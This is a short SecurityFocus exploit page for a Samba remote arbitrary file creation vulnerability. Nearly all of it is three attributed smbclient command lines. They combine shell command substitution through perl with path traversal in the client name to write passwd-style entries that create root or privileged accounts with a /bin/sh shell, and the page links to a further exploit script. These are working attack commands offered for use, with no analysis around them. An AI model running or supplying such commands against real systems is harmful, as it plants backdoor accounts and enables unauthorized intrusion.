Samba Remote Arbitrary File Creation Vulnerability

Some variations of methods used to exploit this vulnerability:

From Michal Zalewski <lcamtuf@bos.bindview.com>

smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N

From zhhsun <zhhsun@xanet.edu.cn>

smbclient //NIMUE/"`perl -e '{print "\nopendoor::511:511::/:/bin/sh\n"}'`" -n ../../../tmp/x -N -I 192.168.12.13

and also

smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N -I 192.168.12.13

Yugo Yugos <yuggoboy@hotmail.com> provided an exploit script. It is available at http://www.securityfocus.com/data/vulnerabilities/exploits/samba-exp.sh


 

Privacy Statement
Copyright 2010, SecurityFocus